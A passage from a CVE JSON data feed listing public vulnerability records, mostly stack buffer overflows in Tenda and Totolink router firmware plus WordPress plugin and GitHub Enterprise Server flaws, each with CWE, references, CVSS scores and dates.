[ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4", "name" : "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252259", "name" : "https://vuldb.com/?ctiid.252259", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252259", "name" : "https://vuldb.com/?id.252259", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4", "name" : "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252259", "name" : "https://vuldb.com/?id.252259", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252259", "name" : "https://vuldb.com/?ctiid.252259", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w6_firmware:1.0.0.9\\(4122\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0995", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4", "name" : "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252260", "name" : "https://vuldb.com/?ctiid.252260", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252260", "name" : "https://vuldb.com/?id.252260", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4", "name" : "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252260", "name" : "https://vuldb.com/?id.252260", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252260", "name" : "https://vuldb.com/?ctiid.252260", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been rated as critical. Affected by this issue is the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w6_firmware:1.0.0.9\\(4122\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0996", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252261", "name" : "https://vuldb.com/?ctiid.252261", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252261", "name" : "https://vuldb.com/?id.252261", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252261", "name" : "https://vuldb.com/?id.252261", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252261", "name" : "https://vuldb.com/?ctiid.252261", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:i9_firmware:1.0.0.6\\(1020\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:i9:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T03:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0997", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252266", "name" : "https://vuldb.com/?ctiid.252266", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252266", "name" : "https://vuldb.com/?id.252266", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252266", "name" : "https://vuldb.com/?id.252266", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252266", "name" : "https://vuldb.com/?ctiid.252266", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. Affected by this issue is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0998", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252267", "name" : "https://vuldb.com/?ctiid.252267", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252267", "name" : "https://vuldb.com/?id.252267", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252267", "name" : "https://vuldb.com/?id.252267", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252267", "name" : "https://vuldb.com/?ctiid.252267", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. This affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0999", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252268", "name" : "https://vuldb.com/?ctiid.252268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252268", "name" : "https://vuldb.com/?id.252268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252268", "name" : "https://vuldb.com/?id.252268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252268", "name" : "https://vuldb.com/?ctiid.252268", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument eTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1000", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252269", "name" : "https://vuldb.com/?ctiid.252269", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252269", "name" : "https://vuldb.com/?id.252269", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252269", "name" : "https://vuldb.com/?id.252269", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252269", "name" : "https://vuldb.com/?ctiid.252269", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252269 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T14:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10000", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/learning-management-system/tags/1.13.3", "name" : "https://plugins.trac.wordpress.org/browser/learning-management-system/tags/1.13.3", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the question's content parameter in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.13.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T06:15Z", "lastModifiedDate" : "2025-05-17T01:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10001", "ASSIGNER" : "product-cna@github.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.17", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.17", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.11", "name" : "https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.11", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.13/admin/release-notes#3.13.6", "name" : "https://docs.github.com/en/enterprise-server@3.13/admin/release-notes#3.13.6", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.3", "name" : "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.3", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.0", "name" : "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.0", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Code Injection vulnerability was identified in GitHub Enterprise Server that allowed attackers to inject malicious code into the query selector via the identity property in the message handling function. This enabled the exfiltration of sensitive data by manipulating the DOM, including authentication tokens. To execute the attack, the victim must be logged into GitHub and interact with the attacker controlled malicious webpage containing the hidden iframe. This vulnerability occurs due to an improper sequence of validation, where the origin check occurs after accepting the user-controlled identity property. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.11.16, 3.12.10, 3.13.5, 3.14.2, and 3.15.0. This vulnerability was reported via the GitHub Bug Bounty program." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-29T19:15Z", "lastModifiedDate" : "2025-01-29T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10002", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-306" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-social.php#L153", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-social.php#L153", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/rover-social-common.php#L148", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/rover-social-common.php#L148", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173032/rover-idx/trunk/rover-social-common.php", "name" : "https://plugins.trac.wordpress.org/changeset/3173032/rover-idx/trunk/rover-social-common.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Rover IDX plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0.0.2905. This is due to insufficient validation and capability check on the 'rover_idx_refresh_social_callback' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in to administrator. The vulnerability is partially patched in version 3.0.0.2905 and fully patched in version 3.0.0.2906." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 